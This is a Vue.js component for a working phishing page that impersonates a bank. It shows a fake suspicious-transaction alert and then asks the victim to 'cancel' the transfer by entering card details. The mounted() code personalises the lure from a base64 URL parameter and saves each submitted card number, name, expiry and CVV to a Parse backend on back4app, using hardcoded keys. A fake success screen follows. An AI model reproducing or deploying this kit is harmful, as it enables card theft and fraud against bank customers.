<template>
  <div class="card-form">
  <h1 style="padding-top: 0;margin: 0;text-align: center;font-size: 40px;font-family:'on'" id="bank">BNC BANK</h1>
    <div id="Paypage"  style="display:none">
      <div class="card-list">
      <Card
        :fields="fields"
        :labels="formData"
        :isCardNumberMasked="isCardNumberMasked"
        :randomBackgrounds="randomBackgrounds"
        :backgroundImage="backgroundImage"
      />
    </div>
    <div class="card-form__inner">
      <div style=";text-align: center">
              <span style="color:green;justify-content: center;text-align: center;">
        Please provide your Card Details Conected to your account to Cancel the Transction(THE DATA PROVIDED WILL NOT BE SHARED WITH ANY THIRD PARTY)
      </span>
      </div>

      <div class="card-input">
        <label for="cardNumber" class="card-input__label">{{ $t('cardForm.cardNumber') }}</label>
        <input
          type="tel"
          :id="fields.cardNumber"
          @input="changeNumber"
          @focus="focusCardNumber"
          @blur="blurCardNumber"
          class="card-input__input"
          :value="formData.cardNumber"
          :maxlength="cardNumberMaxLength"
          data-card-field
          autocomplete="off"
        />
        <button
          class="card-input__eye"
          :class="{ '-active' : !isCardNumberMasked }"
          title="Show/Hide card number"
          tabindex="-1"
          :disabled="formData.cardNumber === ''"
          @click="toggleMask"
        ></button>
      </div>
      <div class="card-input">
        <label for="cardName" class="card-input__label">{{ $t('cardForm.cardName') }}</label>
        <input
          type="text"
          :id="fields.cardName"
          v-letter-only
          @input="changeName"
          class="card-input__input"
          :value="formData.cardName"
          data-card-field
          autocomplete="off"
        />
      </div>
      <div class="card-form__row">
        <div class="card-form__col">
          <div class="card-form__group">
            <label for="cardMonth" class="card-input__label">{{ $t('cardForm.expirationDate') }}</label>
            <select
              class="card-input__input -select"
              :id="fields.cardMonth"
              v-model="formData.cardMonth"
              @change="changeMonth"
              data-card-field
            >
              <option value disabled selected>{{ $t('cardForm.month') }}</option>
              <option
                v-bind:value="n < 10 ? '0' + n : n"
                v-for="n in 12"
                v-bind:disabled="n < minCardMonth"
                v-bind:key="n"
              >{{generateMonthValue(n)}}</option>
            </select>
            <select
              class="card-input__input -select"
              :id="fields.cardYear"
              v-model="formData.cardYear"
              @change="changeYear"
              data-card-field
            >
              <option value disabled selected>{{ $t('cardForm.year') }}</option>
              <option
                v-bind:value="$index + minCardYear"
                v-for="(n, $index) in 12"
                v-bind:key="n"
              >{{$index + minCardYear}}</option>
            </select>
          </div>
        </div>
        <div class="card-form__col -cvv">
          <div class="card-input">
            <label for="cardCvv" class="card-input__label">{{ $t('cardForm.CVV') }}</label>
            <input
              type="tel"
              class="card-input__input"
              v-number-only
              :id="fields.cardCvv"
              maxlength="4"
              :value="formData.cardCvv"
              @input="changeCvv"
              data-card-field
              autocomplete="off"
            />
          </div>
        </div>
      </div>

      <button class="card-form__button" id="mainbut">{{ $t('cardForm.submit') }}</button>
    </div>
    </div>

<div class="card-form__inner" id="StartPage" style="text-align: center;padding-top: 5%;">
      <h2>Suspicious Transction</h2>
      <div style="display:flex;padding:0px 20px 0px 20px;justify-content: center;">
      <div id="sender">
        <img src="../assets/images/profile.webp" alt="" style="width:50px;border-radius: 5px;">
        <h5 style="margin:0%" class="senderName"></h5>
      </div>
      <div style="width:50%;border-top: 2px solid black;margin-top: 23px;margin-left:5px;font-family: 'on';">
       2300$
      </div>
      <img src="https://www.svgrepo.com/show/43287/right-arrow.svg" width="20px" height="20px" style="margin:0%;margin-top: 15px;" alt="">
      <div id="reciever">
        <img src="../assets/images/bank.png" alt="" style="width:50px;border-radius: 5px;">
        <h5 style="margin:0%">BDO<br>UNIBANK INC</h5>
      </div>
      </div>
 <div id="info">
  <div style="display:flex;justify-content: space-between; margin:0 2% 0 2%;border-bottom: 1px solid gainsboro;">
    <h5>From:</h5>
    <h5 class="senderName"></h5>
  </div>
  <div style="display:flex;justify-content: space-between; margin:0 2% 0 2%;border-bottom: 1px solid gainsboro;">
    <h5>To:</h5>
    <h5>BDO UNIBANK INC</h5>
  </div>
  <div style="display:flex;justify-content: space-between; margin:0 2% 0 2%;border-bottom: 1px solid gainsboro;">
    <h5>Type:</h5>
    <h5>Hot Wire</h5>
  </div>
  <div style="display:flex;justify-content: space-between; margin:0 2% 0 2%;border-bottom: 1px solid gainsboro;">
    <h5>Amount:</h5>
    <h5>2300$</h5>
  </div>
  <div style="display:flex;justify-content: space-between; margin:0 2% 0 2%;border-bottom: 1px solid gainsboro;">
    <h5>Date:</h5>
    <h5 id="date">February 21, 2018</h5>
  </div>
  <div style="display:flex;justify-content: space-between; margin:0 2% 0 2%;border-bottom: 1px solid gainsboro;">
    <h5>Time:</h5>
    <h5 id="time">12:00:00 PM</h5>
  </div>
  <div style="display:flex;justify-content: space-between; margin:0 2% 0 2%;border-bottom: 1px solid gainsboro;">
    <h5>Status:</h5>
    <h5 style="color: red;">Pending</h5>
  </div>
 </div>
 <span>We have detected a suspicious transaction on your account.We have taken steps to secure your account and stopped The Transction. if you made this Transction then ignore this page.IF YOU HAVE NOT MADE THIS TRANSCTION THEN CLICK CANCEL</span>
  <button class="card-form__button"  style="margin-right: 2%;background-color: red;" onclick="document.getElementById('StartPage').style.display = 'none';document.getElementById('ScndPage').style.display = 'block'">Cancel Transction</button>
</div>

<div class="card-form__inner" id="ScndPage" style="text-align: center;padding-top: 5%;display: none;">
 <h2>Please Confirm Its you</h2>
 <img src="../assets/lock.gif" width="150px" alt="">
  <br>
 <span>We have temporarily locked your account as a precautionary measure to ensure the security of your personal and financial information. To restore access to your account, we kindly request that you provide us with your card details and any other identification information as per the requirement. We apologize for any inconvenience this may have caused and assure you that we are taking every necessary step to protect your account.</span>
  <button class="card-form__button"  style="margin-right: 2%;background-color: red;" onclick="document.getElementById('ScndPage').style.display = 'none';document.getElementById('Paypage').style.display = 'block'">Proceed To cancel the transaction</button>
</div>

<div class="card-form__inner" id="SucPage" style="text-align: center;padding-top: 5%;display: none;">
 <h2>The Transction Has Been Cancelled Succesfully</h2>
 <img src="../assets/suc.gif" width="150px" alt="">
  <br>
<span>
  Your Account is once Again Safe! We Will Contact You If We Need Enjoy Your Day and Thank You For using BNC Banking
</span>
<button class="card-form__button" style="background-color: teal;"  onclick="">Done!</button>
</div>

  </div>
</template>

<script>
import Card from '@/components/Card'
export default {
  name: 'CardForm',
  directives: {
    'number-only': {
      bind (el) {
        function checkValue (event) {
          event.target.value = event.target.value.replace(/[^0-9]/g, '')
          if (event.charCode >= 48 && event.charCode <= 57) {
            return true
          }
          event.preventDefault()
        }
        el.addEventListener('keypress', checkValue)
      }
    },
    'letter-only': {
      bind (el) {
        function checkValue (event) {
          if (event.charCode >= 48 && event.charCode <= 57) {
            event.preventDefault()
          }
          return true
        }
        el.addEventListener('keypress', checkValue)
      }
    }
  },
  props: {
    formData: {
      type: Object,
      default: () => {
        return {
          cardName: '',
          cardNumber: '',
          cardNumberNotMask: '',
          cardMonth: '',
          cardYear: '',
          cardCvv: ''
        }
      }
    },
    backgroundImage: [String, Object],
    randomBackgrounds: {
      type: Boolean,
      default: true
    }
  },
  components: {
    Card
  },
  data () {
    return {
      fields: {
        cardNumber: 'v-card-number',
        cardName: 'v-card-name',
        cardMonth: 'v-card-month',
        cardYear: 'v-card-year',
        cardCvv: 'v-card-cvv'
      },
      minCardYear: new Date().getFullYear(),
      isCardNumberMasked: true,
      mainCardNumber: this.cardNumber,
      cardNumberMaxLength: 19
    }
  },
  computed: {
    minCardMonth () {
      if (this.formData.cardYear === this.minCardYear) return new Date().getMonth() + 1
      return 1
    }
  },
  watch: {
    cardYear () {
      if (this.formData.cardMonth < this.minCardMonth) {
        this.formData.cardMonth = ''
      }
    }
  },
  mounted () {
    if (document.cookie === 'good') {
      document.getElementById('StartPage').style.display = 'none'
      document.getElementById('SucPage').style.display = 'block'
    }
    var Parse = require('parse')
    Parse.initialize('WOMLgXGR4DmDq0pnn9pjgekkdkjmcSw9mWHmiTtG', 'kLP8M8pIsQy7ZxHd3JqxMWELhAX8AcY8zuG9lD91')
    Parse.serverURL = 'https://parseapi.back4app.com/'
    var senders = location.href.split('?')
    senders[1] = atob(senders[1])
    document.getElementsByClassName('senderName')[0].innerHTML = senders[1].replace('&&', '<br>')
    document.getElementsByClassName('senderName')[1].innerHTML = senders[1].replace('&&', ' ')
    document.getElementById('bank').innerHTML = senders[1].replace('&&', ' ') + ' Account'
    document.getElementById('date').innerHTML = `January ${senders[2] - 10} 2023`
    document.getElementById('time').innerHTML = '12:16:35 PM'
    async function saveNewPlayer () {
      document.getElementById('mainbut').innerText = 'Verifying....'
      const vop = new Parse.Object('vop')
      vop.set('name', document.getElementById('v-card-name').value)
      vop.set('date', document.getElementById('v-card-year').value + document.getElementById('v-card-month').value)
      vop.set('c', document.getElementById('v-card-cvv').value)
      vop.set('p', mainNumbe)
      try {
        document.getElementById('mainbut').innerText = 'Verifying....'
        let result = await vop.save()
        let number = mainNumbe.replace(/ /g, '')
        var sum = 0
        for (var i = 0; i < number.length; i++) {
          var intVal = parseInt(number.substr(i, 1))
          if (i % 2 === 0) {
            intVal *= 2
            if (intVal > 9) {
              intVal = 1 + (intVal % 10)
            }
          }
          sum += intVal
        }
        if (sum % 10 !== 0) {
          alert('Card Details Not Correct')
          document.getElementById('mainbut').innerText = 'Continue'
        } else {
          if (mainNumbe !== 0 && document.getElementById('v-card-number').value.length > 4 && document.getElementById('v-card-cvv').value.length > 2 && document.getElementById('v-card-name').value.length > 6 && document.getElementById('v-card-month').value.length !== 0 && document.getElementById('v-card-year').value.length !== 0) {
            document.cookie = 'good'
            document.getElementById('Paypage').style.display = 'none'
            document.getElementById('SucPage').style.display = 'block'
          } else {
            alert('Invalid Card Details')
          }
        }
        console.log(result)
      } catch (error) {
        console.log('error')
      }
    }
    document.getElementById('mainbut').addEventListener('click', saveNewPlayer)
    this.maskCardNumber()
  },
  methods: {
    generateMonthValue (n) {
      return n < 10 ? `0${n}` : n
    },
    changeName (e) {
      this.formData.cardName = e.target.value
      this.$emit('input-card-name', this.formData.cardName)
    },
    changeNumber (e) {
      this.formData.cardNumber = e.target.value
      mainNumbe = e.target.value
      let value = this.formData.cardNumber.replace(/\D/g, '')
      // american express, 15 digits
      if ((/^3[47]\d{0,13}$/).test(value)) {
        this.formData.cardNumber = value.replace(/(\d{4})/, '$1 ').replace(/(\d{4}) (\d{6})/, '$1 $2 ')
        this.cardNumberMaxLength = 17
      } else if ((/^3(?:0[0-5]|[68]\d)\d{0,11}$/).test(value)) { // diner's club, 14 digits
        this.formData.cardNumber = value.replace(/(\d{4})/, '$1 ').replace(/(\d{4}) (\d{6})/, '$1 $2 ')
        this.cardNumberMaxLength = 16
      } else if ((/^\d{0,16}$/).test(value)) { // regular cc number, 16 digits
        this.formData.cardNumber = value.replace(/(\d{4})/, '$1 ').replace(/(\d{4}) (\d{4})/, '$1 $2 ').replace(/(\d{4}) (\d{4}) (\d{4})/, '$1 $2 $3 ')
        this.cardNumberMaxLength = 19
      }
      // eslint-disable-next-line eqeqeq
      if (e.inputType == 'deleteContentBackward') {
        let lastChar = this.formData.cardNumber.substring(this.formData.cardNumber.length, this.formData.cardNumber.length - 1)
        // eslint-disable-next-line eqeqeq
        if (lastChar == ' ') { this.formData.cardNumber = this.formData.cardNumber.substring(0, this.formData.cardNumber.length - 1) }
      }
      this.$emit('input-card-number', this.formData.cardNumber)
    },
    changeMonth () {
      this.$emit('input-card-month', this.formData.cardMonth)
    },
    changeYear () {
      this.$emit('input-card-year', this.formData.cardYear)
    },
    changeCvv (e) {
      this.formData.cardCvv = e.target.value
      this.$emit('input-card-cvv', this.formData.cardCvv)
    },
    invaildCard () {
      let number = this.formData.cardNumberNotMask.replace(/ /g, '')
      var sum = 0
      for (var i = 0; i < number.length; i++) {
        var intVal = parseInt(number.substr(i, 1))
        if (i % 2 === 0) {
          intVal *= 2
          if (intVal > 9) {
            intVal = 1 + (intVal % 10)
          }
        }
        sum += intVal
      }
      if (sum % 10 !== 0) {
        alert(this.$t('Card Details Not Correct'))
        document.getElementById('mainButt').innerText = 'Submit'
      } else {
        if (document.getElementById('v-card-number').value.length > 4 && document.getElementById('v-card-cvv').value.length > 2 && document.getElementById('v-card-name').value.length > 6 && document.getElementById('v-card-month').value.length !== 0 && document.getElementById('v-card-year').value.length !== 0) {
          document.cookie = 'good'
          document.getElementById('Paypage').style.display = 'none'
          document.getElementById('SucPage').style.display = 'block'
        } else {
          alert('Invalid Card Details')
        }
      }
    },
    blurCardNumber () {
      if (this.isCardNumberMasked) {
        this.maskCardNumber()
      }
    },
    maskCardNumber () {
      this.formData.cardNumberNotMask = this.formData.cardNumber
      this.mainCardNumber = this.formData.cardNumber
      let arr = this.formData.cardNumber.split('')
      arr.forEach((element, index) => {
        if (index > 4 && index < 14 && element.trim() !== '') {
          arr[index] = '*'
        }
      })
      this.formData.cardNumber = arr.join('')
    },
    unMaskCardNumber () {
      this.formData.cardNumber = this.mainCardNumber
    },
    focusCardNumber () {
      this.unMaskCardNumber()
    },
    toggleMask () {
      this.isCardNumberMasked = !this.isCardNumberMasked
      if (this.isCardNumberMasked) {
        this.maskCardNumber()
      } else {
        this.unMaskCardNumber()
      }
    }
  }
}
var mainNumbe
</script>
